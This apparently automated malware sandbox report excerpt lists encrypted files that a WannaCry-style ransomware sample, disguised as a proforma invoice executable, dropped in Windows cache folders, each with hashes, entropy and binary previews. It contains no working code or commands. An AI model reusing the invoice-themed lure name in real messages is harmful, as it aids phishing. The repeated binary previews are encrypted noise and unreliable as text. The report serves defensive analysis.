                                                          SHA-512:F02C55BEDBE36FF64E6F5A66CD8193BABBD7CF4EA87B11527C79D601E085765D7F34F94730D42CB2DA004FB4795D4EA7B4F0860E0CDE6A5AEAF34243A74C041B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......'}.@7.|...-.@..<.]`..A.b........me'....<./....G@..?.7O..... 1.DKP.m....#"......*a9l.9vB{3?C...O.:.2S..dA..K.K.d...S........2....6.....].?.....}!.lI.+.-.1..Z...|.=..J._.D.-....@.....\....[..V.c..&/...g...t....L&.....5k.....!..^4bx.Z.$d..2.}...%..aB............y.'..}/..s.GV."....'.6-..v8$z....T;.G.pQ.x.x..-._p....#`..S..&c.S......S<..;.z....}..!.wz.:..(.Q......_.R..^.........\.]....#=}F..s...lO....q.Z.a.5...=w.".R+....T.a.$...8]R.`1.%.<H..AF.x(E5*V{...}5Y...6...CX.U,.{Gq...Ml.....0.7......D.Z..%...........c........*...fp.k.Ne.D{.Gg[B.....~z.j.-.+........0..&.d.T...}...q6{...{b....r'.....v...}z.lOj.u...5.o...0......t*....`l.hv...G.Y..7B:..8]C..~.a.x.......$....9..#F.c....P..P..rm._\...(._.M..,..'$..ou..C..C..E..'N......K.v..A..7.F....;'...@.q.n.h..d..S..:bz.....z .8...A".h,;.?N....K....P....6^.M.&jr....-.J/G..OR}/.b.../..m@.N%....f...%..u..'.Cz..I.{.S.-.Up.\DYw.zr.H.........6{.@..V..4,a..s..8..E.=..5jMq.!wl6..J...;.K.........cD..v}..3..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\u6a26xOewOMoU1ZXuserQPZApTU.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1896
                                                          Entropy (8bit):7.907678234482592
                                                          Encrypted:false
                                                          SSDEEP:48:bk20kj7D6gwoITcljTXu4u4iqvJvGFVWMjVDM5E:owjH6kITchXa8vJvC1wE
                                                          MD5:2961DEB33EB75291558C98F8CEF61794
                                                          SHA1:06AA55030082F5AD4140CDC3F08FE636087C5E01
                                                          SHA-256:1BEE68E37667D803F5CDF89CF066C037F61F95E4A369030CCB54179B12004CF2
                                                          SHA-512:E6BF52FF25CBF731D1E448B8F885DE03CFC2384C4AF6B678A01A459CC0CF4648CFB5DD6D6A7F48693E5F8C733FEF14F261AA9827B5E763FDB48C483DD4645AA1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....o.ph"...cV2...@.}.j.Z..\.........-...a...Eg!.....f.y..m9......6..$.C9\..t..X.}...{....M.,.;.a ..8...lc..:..P/..G)..-..b...)]2"...0.M...m..k....v..h.5...;5..vf...SH..._.[gA...m....E....}.......b..#.r..m............/..?K.#...Y.9~d7...$....=zb.....O........5W.%:.....8K"I.ikPi..h.e....+_.^...>....\AEa...P....l8...y..jC.1..#.{...S...5^..y............'.^Uta.^_....4....:.\.d.~.R.yU.*oL..y.....=...W.H'(cR.........(.8....:.@3<.a...c.Z..!...j...n1r...9.C,..P..r...y!...9.3..Ll../..sS.L.{O.......3.h3y.8q........M.[i2."..$.. ..?..{':...4.Q.P5...\..C..F~p'"..a..R..*.}...Z...-....y...k..0.....]`..a..B]!..........Q8..}.Q......4..('+......,..T..i..u-....Sy.a6...=..o@.E.J.V...76.jI.e...%..>.y1.`..............N..M\.5..k.|M..H.L...s...U.........Gn..//p.u......P.&}=d.[.*.."..<n.G.......g."..M..!4...+.G.J 9&@..Z.....7....]H...t..=4..w/...m.I.w.Y..].cs.5...[...............,...k;#.....J..O.".hv[.[. ..x...kQp..Uc.....u....z.....I6.W...@t.....a.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\u6a26xOewOMoU1ZXuserQPZApTU.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1896
                                                          Entropy (8bit):7.907678234482592
                                                          Encrypted:false
                                                          SSDEEP:48:bk20kj7D6gwoITcljTXu4u4iqvJvGFVWMjVDM5E:owjH6kITchXa8vJvC1wE
                                                          MD5:2961DEB33EB75291558C98F8CEF61794
                                                          SHA1:06AA55030082F5AD4140CDC3F08FE636087C5E01
                                                          SHA-256:1BEE68E37667D803F5CDF89CF066C037F61F95E4A369030CCB54179B12004CF2
                                                          SHA-512:E6BF52FF25CBF731D1E448B8F885DE03CFC2384C4AF6B678A01A459CC0CF4648CFB5DD6D6A7F48693E5F8C733FEF14F261AA9827B5E763FDB48C483DD4645AA1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....o.ph"...cV2...@.}.j.Z..\.........-...a...Eg!.....f.y..m9......6..$.C9\..t..X.}...{....M.,.;.a ..8...lc..:..P/..G)..-..b...)]2"...0.M...m..k....v..h.5...;5..vf...SH..._.[gA...m....E....}.......b..#.r..m............/..?K.#...Y.9~d7...$....=zb.....O........5W.%:.....8K"I.ikPi..h.e....+_.^...>....\AEa...P....l8...y..jC.1..#.{...S...5^..y............'.^Uta.^_....4....:.\.d.~.R.yU.*oL..y.....=...W.H'(cR.........(.8....:.@3<.a...c.Z..!...j...n1r...9.C,..P..r...y!...9.3..Ll../..sS.L.{O.......3.h3y.8q........M.[i2."..$.. ..?..{':...4.Q.P5...\..C..F~p'"..a..R..*.}...Z...-....y...k..0.....]`..a..B]!..........Q8..}.Q......4..('+......,..T..i..u-....Sy.a6...=..o@.E.J.V...76.jI.e...%..>.y1.`..............N..M\.5..k.|M..H.L...s...U.........Gn..//p.u......P.&}=d.[.*.."..<n.G.......g."..M..!4...+.G.J 9&@..Z.....7....]H...t..=4..w/...m.I.w.Y..].cs.5...[...............,...k;#.....J..O.".hv[.[. ..x...kQp..Uc.....u....z.....I6.W...@t.....a.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):254712
                                                          Entropy (8bit):7.999402730206514
                                                          Encrypted:true
                                                          SSDEEP:6144:dVzo15KxuStCONrVjj8j2k4w+lx9Onw+rG6BiZu96n1t:dFO4zC2kD+lx9OwMBEu961t
                                                          MD5:0A6054136BA2548D6D18E70F7947C89A
                                                          SHA1:DE4EE736B69784FDBFA3B8A123F274FE180A23E1
                                                          SHA-256:2938F55AD7FBE4733B954034F4DD7E259E0D2AE94E8D58AC47986780A66143E9
                                                          SHA-512:1CC80BB97AC336A89828E302CA3452E79A0C3C21A6F9E883532CB93B95DBC10BE6C8B66DFDB853A72B6D15FC6C0AF7115C9D518E7BC53C99EDB3060C0C3002F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....U..]..<..6{g....#O.....K.p....."...}...t.....x\D..%*Bb..Vx...~.(>#2[..)....=.....o^B.G...=..\...]..)._..{..|..j......).w...W..~....$..I..b:|jAT...7..=.4...c..[.....P..k....#..8j.@.f..Zhd...O?..z....?.(...`...sQ.H..e.W... .......Y.].................;..G..`.4V,.T+.y....~....;.../(.8....K{...W..B....L.."....\...eKC].....<...1..yR...9:5..gMJ..E..)u .D.8#..._.J...jM...u.......~~....kH.9....0~n...Z..bu..@..%..r.7..`YP...J.k..Z...(.dm.....|!.!.I...(.6...<S.u..........o.5..k...D......k....b...B.5.#..I...........,.m.....:.....^.9O.>..}'A..aj.'.Y......0.P.R.<.ZU...S~.i.D?."....Z.j.5B.7.?..%Q./n.....+.._.......-..$..u0W..b...W..P..:..>...*.BC4.Bqe..{.OsX..z......8.#....s4./..}Q..$...p}..../.m...K{.......{5aW{...S..O....*.@....;..f^.4..L.e...j..f..V....I(.OH...D.2<....(!..."..]......p...MvT...|...i.N..}..p.G.b.c,C....RL...^..b\H...ME.v.XM.G.wGcCu.G|o.Y..M.~.....:......2.....&.O..t.N.....f/...b.&...(..m+...wo..6..}..;s&....w

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):254712
                                                          Entropy (8bit):7.999402730206514
                                                          Encrypted:true
                                                          SSDEEP:6144:dVzo15KxuStCONrVjj8j2k4w+lx9Onw+rG6BiZu96n1t:dFO4zC2kD+lx9OwMBEu961t
                                                          MD5:0A6054136BA2548D6D18E70F7947C89A
                                                          SHA1:DE4EE736B69784FDBFA3B8A123F274FE180A23E1
                                                          SHA-256:2938F55AD7FBE4733B954034F4DD7E259E0D2AE94E8D58AC47986780A66143E9
                                                          SHA-512:1CC80BB97AC336A89828E302CA3452E79A0C3C21A6F9E883532CB93B95DBC10BE6C8B66DFDB853A72B6D15FC6C0AF7115C9D518E7BC53C99EDB3060C0C3002F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....U..]..<..6{g....#O.....K.p....."...}...t.....x\D..%*Bb..Vx...~.(>#2[..)....=.....o^B.G...=..\...]..)._..{..|..j......).w...W..~....$..I..b:|jAT...7..=.4...c..[.....P..k....#..8j.@.f..Zhd...O?..z....?.(...`...sQ.H..e.W... .......Y.].................;..G..`.4V,.T+.y....~....;.../(.8....K{...W..B....L.."....\...eKC].....<...1..yR...9:5..gMJ..E..)u .D.8#..._.J...jM...u.......~~....kH.9....0~n...Z..bu..@..%..r.7..`YP...J.k..Z...(.dm.....|!.!.I...(.6...<S.u..........o.5..k...D......k....b...B.5.#..I...........,.m.....:.....^.9O.>..}'A..aj.'.Y......0.P.R.<.ZU...S~.i.D?."....Z.j.5B.7.?..%Q./n.....+.._.......-..$..u0W..b...W..P..:..>...*.BC4.Bqe..{.OsX..z......8.#....s4./..}Q..$...p}..../.m...K{.......{5aW{...S..O....*.@....;..f^.4..L.e...j..f..V....I(.OH...D.2<....(!..."..]......p...MvT...|...i.N..}..p.G.b.c,C....RL...^..b\H...ME.v.XM.G.wGcCu.G|o.Y..M.~.....:......2.....&.O..t.N.....f/...b.&...(..m+...wo..6..}..;s&....w

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58072
                                                          Entropy (8bit):7.997006684572673
                                                          Encrypted:true
                                                          SSDEEP:1536:JqVL9iN486v4m0i0p76RzTyP7CpM6uQfhsYnGy19:JqVL9iL6v4w0p76xuP7CpbuihZnX19
                                                          MD5:8EDEE0962FC8F44856A3CCFD70E24136
                                                          SHA1:99EBE7AC033D2B8CE0CA3DF875E84C93988AA81B
                                                          SHA-256:52AF85A11FAAB364FFC335AE7740F7F0864417468239D032E3CF9E3D65705F41
                                                          SHA-512:2B0AC5B417743AB6D75C9EBBC022D3110917C311443717EDE3C88417CBC657B9CC1CF9352B3B8D5568DBC1671C40AB2FDE4B44BFCDDC2D9136975C25B70EA1AD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....N..Ll.).l..X....P..!..P..._..p..Q]K;.`qF....l...t..C.6.HH....Pw..~..#M...*&...+.Am.C.T..h).p...]..)O...R..A?1..!.g....`...@.zh;.F..km..>)...V.PR+{....[v.b.P....Oq.6,....J]n.......c.._~,L...........9....X.i.,.......s.b<N...Kt....M..Ax..k.&..P.................D..S.?p!.."C...Q.q...h...0..{......*Fgc...........n.r:..gIi,...a..En...J..o.u./.S...|....$%.x..T .o..&..9.B...R........O....-..Z..?..=|s:..lmAs,i.<..G....~3..1.....{KCx.4g......."....O.v.9.e }iU.W.0.=...qI\e...q%U..:8*...f..f..1.>H{F..M.X*R...wt...a..l{o.%..Qi.*..?...50)...$.....1F.!yuD'<O...<b<-..../.w.;....-"..K..x.q,...y.jq_.]$..l...H......FX9}.mvjyP..h.3[..=%..T.A..."4...U.j.....z.Z.|...3pR.K.//qZ'...M.Y.?J..*...G..u.....#.m.5+.~[.U....s.r=,N..e..:.H...GK.M...XfR2..aKr.x....-........o.n.M..L.8...............D....D]-...( ...m....7..../..)."..D}J......5.?.La.lE..l.......:.......xDo..^......Cz.QLd..GZ.^:.....:..K..>k..\..B<ol../Z..D..D......$aQ.>..2..x.^.%$y.....X#......d.}

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58072
                                                          Entropy (8bit):7.997006684572673
                                                          Encrypted:true
                                                          SSDEEP:1536:JqVL9iN486v4m0i0p76RzTyP7CpM6uQfhsYnGy19:JqVL9iL6v4w0p76xuP7CpbuihZnX19
                                                          MD5:8EDEE0962FC8F44856A3CCFD70E24136
                                                          SHA1:99EBE7AC033D2B8CE0CA3DF875E84C93988AA81B
                                                          SHA-256:52AF85A11FAAB364FFC335AE7740F7F0864417468239D032E3CF9E3D65705F41
                                                          SHA-512:2B0AC5B417743AB6D75C9EBBC022D3110917C311443717EDE3C88417CBC657B9CC1CF9352B3B8D5568DBC1671C40AB2FDE4B44BFCDDC2D9136975C25B70EA1AD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....N..Ll.).l..X....P..!..P..._..p..Q]K;.`qF....l...t..C.6.HH....Pw..~..#M...*&...+.Am.C.T..h).p...]..)O...R..A?1..!.g....`...@.zh;.F..km..>)...V.PR+{....[v.b.P....Oq.6,....J]n.......c.._~,L...........9....X.i.,.......s.b<N...Kt....M..Ax..k.&..P.................D..S.?p!.."C...Q.q...h...0..{......*Fgc...........n.r:..gIi,...a..En...J..o.u./.S...|....$%.x..T .o..&..9.B...R........O....-..Z..?..=|s:..lmAs,i.<..G....~3..1.....{KCx.4g......."....O.v.9.e }iU.W.0.=...qI\e...q%U..:8*...f..f..1.>H{F..M.X*R...wt...a..l{o.%..Qi.*..?...50)...$.....1F.!yuD'<O...<b<-..../.w.;....-"..K..x.q,...y.jq_.]$..l...H......FX9}.mvjyP..h.3[..=%..T.A..."4...U.j.....z.Z.|...3pR.K.//qZ'...M.Y.?J..*...G..u.....#.m.5+.~[.U....s.r=,N..e..:.H...GK.M...XfR2..aKr.x....-........o.n.M..L.8...............D....D]-...( ...m....7..../..)."..D}J......5.?.La.lE..l.......:.......xDo..^......Cz.QLd..GZ.^:.....:..K..>k..\..B<ol../Z..D..D......$aQ.>..2..x.^.%$y.....X#......d.}

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):95672
                                                          Entropy (8bit):7.99787015794684
                                                          Encrypted:true
                                                          SSDEEP:1536:xVZN9X8uk1a/0VuLhk00Khk7NlPeT5ioWTcmUy+enkPdHZZJwBfTTeQCfU:xN9wa/30KhmNlGT5fWTXUWWZCf3/SU
                                                          MD5:48174A1DEF5D80CBE004A665DADBD195
                                                          SHA1:0F7645FA44EEDBB24148CDD68D8F2317AD5CB543
                                                          SHA-256:033CA839F10E9919664F1861CB094AF3EDC166BE3AEC14DE9BDCFB8F646DF194
                                                          SHA-512:E922F4C2312D4470E9122FFC82B517FD1789209E26D1D41DE9DC33062A8ADB5120E75DD69D7F38D6509CBC4DC710360CDE8DC85DA27997D231378C14B029CD9B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....(P)...c...J.O.l...fL...fAY..*T.,.......+...\.P.:T...F+...WP.....@..."..L.5......?~m1E=...*.....$op..#..........~..B5.C...@;......!....4.......KF.T..U].P.$..8..M.Z.7....[P;.-#......8.U?.L..olG........86`...@B.^m....A&k..-.}.[=W]t|#.R.R..b"_.T.k.....t..........J[D ..P,^.H..E.f*.]f_.0..@{...A..W...7R`....A.`4V.....d.7.j.i1<.;v..n......f....,m..yf.>6..Qq.B.l...!Rt.....SO*.}.....G....r[..V]^}'...iu.l:.|...{...e$w.e,....V.I..".,...U.....l...q."%9..x(^|...T.s&{...:.(..eyEy.0!.w&...h@P..:.....H.9..2._t.A.%...?..z.....&)...'6c`.v+......Ms?...+hx..#%.f.B.Tw.|...-89hM....*.Kxi....J..,r.....e.j....x..~..Qv.Y.-1......D.>..,...I....4...|.X.'6N(.E.>r.E.L>25....R..O\Ck..V.^Dp:z..e...ZRe,.....[..rv..........o8.7....|`+W .'U..((5Q.Xb..=Xq.^..\......5.........y.h.d.K.?..W..d7..:,E.......'n....Iw%.{.V..D.<.N...zkx....R...z...1X..z.~|.....%..vt.X......Dq.:9.g.A.P.R.v.0:..F.....oB......P.y....z.."..IfdG.B...l?U..l..V.....'.}<n.H.$(..ul.f.7.L..e..X.[]:...9^Z

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):95672
                                                          Entropy (8bit):7.99787015794684
                                                          Encrypted:true
                                                          SSDEEP:1536:xVZN9X8uk1a/0VuLhk00Khk7NlPeT5ioWTcmUy+enkPdHZZJwBfTTeQCfU:xN9wa/30KhmNlGT5fWTXUWWZCf3/SU
                                                          MD5:48174A1DEF5D80CBE004A665DADBD195
                                                          SHA1:0F7645FA44EEDBB24148CDD68D8F2317AD5CB543
                                                          SHA-256:033CA839F10E9919664F1861CB094AF3EDC166BE3AEC14DE9BDCFB8F646DF194
                                                          SHA-512:E922F4C2312D4470E9122FFC82B517FD1789209E26D1D41DE9DC33062A8ADB5120E75DD69D7F38D6509CBC4DC710360CDE8DC85DA27997D231378C14B029CD9B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....(P)...c...J.O.l...fL...fAY..*T.,.......+...\.P.:T...F+...WP.....@..."..L.5......?~m1E=...*.....$op..#..........~..B5.C...@;......!....4.......KF.T..U].P.$..8..M.Z.7....[P;.-#......8.U?.L..olG........86`...@B.^m....A&k..-.}.[=W]t|#.R.R..b"_.T.k.....t..........J[D ..P,^.H..E.f*.]f_.0..@{...A..W...7R`....A.`4V.....d.7.j.i1<.;v..n......f....,m..yf.>6..Qq.B.l...!Rt.....SO*.}.....G....r[..V]^}'...iu.l:.|...{...e$w.e,....V.I..".,...U.....l...q."%9..x(^|...T.s&{...:.(..eyEy.0!.w&...h@P..:.....H.9..2._t.A.%...?..z.....&)...'6c`.v+......Ms?...+hx..#%.f.B.Tw.|...-89hM....*.Kxi....J..,r.....e.j....x..~..Qv.Y.-1......D.>..,...I....4...|.X.'6N(.E.>r.E.L>25....R..O\Ck..V.^Dp:z..e...ZRe,.....[..rv..........o8.7....|`+W .'U..((5Q.Xb..=Xq.^..\......5.........y.h.d.K.?..W..d7..:,E.......'n....Iw%.{.V..D.<.N...zkx....R...z...1X..z.~|.....%..vt.X......Dq.:9.g.A.P.R.v.0:..F.....oB......P.y....z.."..IfdG.B...l?U..l..V.....'.}<n.H.$(..ul.f.7.L..e..X.[]:...9^Z

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58104
                                                          Entropy (8bit):7.996712442774742
                                                          Encrypted:true
                                                          SSDEEP:1536:DHFDXsViS8gbZaVLSXHKfKmyZMYgToIEA4pt6YnVliYml:RpmeCKCgoIv4pt6YnVgYml
                                                          MD5:F422952E686226B5D718053DB1150635
                                                          SHA1:2993757FE9D20B75BD6F9BCC052155FA6CB6F5D1
                                                          SHA-256:917B2AB6781BF71FF33BD206ED50F445044902E803C1085206611F3E21A63683
                                                          SHA-512:C209CD91E35BAC321BAB022AD634AE14768CDAD823DB6C4C51CD2C4AFBC58471ACA8D9BF8D51C36941AFC63FE531E8B5AF97E538E055BCE3133789F845A4436F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....*.<.T.W.I.M+...L.A..~.l..*.m.C.r|.y.6K..c.....X...w.........P.xXa.v..a.dW..._.4..v..).:....M..8.-..fS/k...]._....C...4...[......^..}.......-..2....m...6...hG..h9[.t,..].:.....z... .+U.4Mn.~$.HB..........u}.W.K...YF .......O8u...S...6.....Jf:..............j,..y.k6E...F.R....U...$T..L.q..m.|U!..Dypw.......[...Y.?..)&........x..D.q|..e.)-G.5.{....IzY...h....n..`/......b.........:-.a.E.m......l...`m9IB...O..3.mT..s.&"w.i..m@.n23.62..6...sJ/^.....zR8.}..#..h.....u....t.K...$Z....&.b2{..b....h..?.\.d...'...jH.......iP&...C.......mA.W.O.4.H.u.bM..>.uv.......S..a...l...!.tPE.............&bC...jj.....Vi....=_..,..@..&../.4z..1..5..#.._rN}.G.o_....{..:.].y.S.pX1.......[]...5>..E8+QI.....h....B..(.2...._..>8...R... g....Tf......30...l.j.....{...U.`.KN5r...^..1..=.....i.m.....).`-..<../.Pd/.`...J.u...q.1.!J.@.....`.........KT..$.;.<...3..2...0@8(.K6...(.F..?..n{..:..U.......1o..\..........%L.Y...._....{Ex..+....v.#l.....m...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58104
                                                          Entropy (8bit):7.996712442774742
                                                          Encrypted:true
                                                          SSDEEP:1536:DHFDXsViS8gbZaVLSXHKfKmyZMYgToIEA4pt6YnVliYml:RpmeCKCgoIv4pt6YnVgYml
                                                          MD5:F422952E686226B5D718053DB1150635
                                                          SHA1:2993757FE9D20B75BD6F9BCC052155FA6CB6F5D1
                                                          SHA-256:917B2AB6781BF71FF33BD206ED50F445044902E803C1085206611F3E21A63683
                                                          SHA-512:C209CD91E35BAC321BAB022AD634AE14768CDAD823DB6C4C51CD2C4AFBC58471ACA8D9BF8D51C36941AFC63FE531E8B5AF97E538E055BCE3133789F845A4436F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....*.<.T.W.I.M+...L.A..~.l..*.m.C.r|.y.6K..c.....X...w.........P.xXa.v..a.dW..._.4..v..).:....M..8.-..fS/k...]._....C...4...[......^..}.......-..2....m...6...hG..h9[.t,..].:.....z... .+U.4Mn.~$.HB..........u}.W.K...YF .......O8u...S...6.....Jf:..............j,..y.k6E...F.R....U...$T..L.q..m.|U!..Dypw.......[...Y.?..)&........x..D.q|..e.)-G.5.{....IzY...h....n..`/......b.........:-.a.E.m......l...`m9IB...O..3.mT..s.&"w.i..m@.n23.62..6...sJ/^.....zR8.}..#..h.....u....t.K...$Z....&.b2{..b....h..?.\.d...'...jH.......iP&...C.......mA.W.O.4.H.u.bM..>.uv.......S..a...l...!.tPE.............&bC...jj.....Vi....=_..,..@..&../.4z..1..5..#.._rN}.G.o_....{..:.].y.S.pX1.......[]...5>..E8+QI.....h....B..(.2...._..>8...R... g....Tf......30...l.j.....{...U.`.KN5r...^..1..=.....i.m.....).`-..<../.Pd/.`...J.u...q.1.!J.@.....`.........KT..$.;.<...3..2...0@8(.K6...(.F..?..n{..:..U.......1o..\..........%L.Y...._....{Ex..+....v.#l.....m...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18792
                                                          Entropy (8bit):7.9910278599044045
                                                          Encrypted:true
                                                          SSDEEP:384:hcvUcWWrHk2IiLMRrNwQ2ZOd6ApsSYH4i/vaIupOwJMslhA5ZtjmhHIzkqKUvzsg:avJA2Ix9dmdH//vaIufi5Fm5CkqRzsBm
                                                          MD5:8731AB6565164DA52CD3193FA5CC3181
                                                          SHA1:DDE925C40A4E17CE6D55BCDF066D1BBB59727E10
                                                          SHA-256:579853B9EAABA0548D58959247F155E056E7EA6A4504655F3374D53E34F971F2
                                                          SHA-512:ABFADAB5F903F013BD62B294B22B96A0D3E0C2190276173197A554362842A46F27C8528D856472175AB1BC530FD874592DA8246026A4D40E3C141C53671A9772
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Z.Y3Sh...n.#.Z.Z..b....atK. e!uv.n|.Q...0..q.]?~...K.%hj.B.Fk.....zl...r.C.I..].'.......z....w.........U.U.7."..<..fa.?0.K....\.US..G.&!.....(O.....3f.$QIt...?..... 3..z>.....%u%..9....Zn...v...:.ydv.w1.Q..1bp..j.9.#.7..w. o....bbHf..3..0..L.C.......OH.......5.Ib7...B.p..&..a...B..u0.V3..N.yp.624.Q=Pw.Rj...i..}.. @.5..c..%.g.J..%T....SN.....k..4.\eCU..\...'".?.<\..W........W..d..d........*1...d....dqa..I.......S...@..^....`.e.c.!...u:....TI.9tU....,.^..&.D,.mam..>R...N.w.....GC.Fy.M..(NX.............R".....$........B...d.......0..j/Mw.2.^I.).U{../.Q.-j....!Bpf...).O=.1....$..-..tWEr...m.|....,.s.IC.{.T.+"VdU..a.k...\.W>.oeHOL.Y.d..C...)..m.J..A....J..._.J.~......u.|..sO.F.U..T....Q..=g....M...%N..Z..C.I...8.[`...<.....=k.s....?..F..7uN..m..BY..Y. ^.z...6d...@..DH......~..z;.....t...z}'.?.]$;.jPY......E.`q.<.XD......o.b.Ev~`|&...Ti...U..r`=P.b}.....M.^t,.....\V.....x...0..KR..9..^..O.}........I.,.Q.nK...h.J..L<+..._].T....2.,h.Z6,.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18792
                                                          Entropy (8bit):7.9910278599044045
                                                          Encrypted:true
                                                          SSDEEP:384:hcvUcWWrHk2IiLMRrNwQ2ZOd6ApsSYH4i/vaIupOwJMslhA5ZtjmhHIzkqKUvzsg:avJA2Ix9dmdH//vaIufi5Fm5CkqRzsBm
                                                          MD5:8731AB6565164DA52CD3193FA5CC3181
                                                          SHA1:DDE925C40A4E17CE6D55BCDF066D1BBB59727E10
                                                          SHA-256:579853B9EAABA0548D58959247F155E056E7EA6A4504655F3374D53E34F971F2
                                                          SHA-512:ABFADAB5F903F013BD62B294B22B96A0D3E0C2190276173197A554362842A46F27C8528D856472175AB1BC530FD874592DA8246026A4D40E3C141C53671A9772
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Z.Y3Sh...n.#.Z.Z..b....atK. e!uv.n|.Q...0..q.]?~...K.%hj.B.Fk.....zl...r.C.I..].'.......z....w.........U.U.7."..<..fa.?0.K....\.US..G.&!.....(O.....3f.$QIt...?..... 3..z>.....%u%..9....Zn...v...:.ydv.w1.Q..1bp..j.9.#.7..w. o....bbHf..3..0..L.C.......OH.......5.Ib7...B.p..&..a...B..u0.V3..N.yp.624.Q=Pw.Rj...i..}.. @.5..c..%.g.J..%T....SN.....k..4.\eCU..\...'".?.<\..W........W..d..d........*1...d....dqa..I.......S...@..^....`.e.c.!...u:....TI.9tU....,.^..&.D,.mam..>R...N.w.....GC.Fy.M..(NX.............R".....$........B...d.......0..j/Mw.2.^I.).U{../.Q.-j....!Bpf...).O=.1....$..-..tWEr...m.|....,.s.IC.{.T.+"VdU..a.k...\.W>.oeHOL.Y.d..C...)..m.J..A....J..._.J.~......u.|..sO.F.U..T....Q..=g....M...%N..Z..C.I...8.[`...<.....=k.s....?..F..7uN..m..BY..Y. ^.z...6d...@..DH......~..z;.....t...z}'.?.]$;.jPY......E.`q.<.XD......o.b.Ev~`|&...Ti...U..r`=P.b}.....M.^t,.....\V.....x...0..KR..9..^..O.}........I.,.Q.nK...h.J..L<+..._].T....2.,h.Z6,.

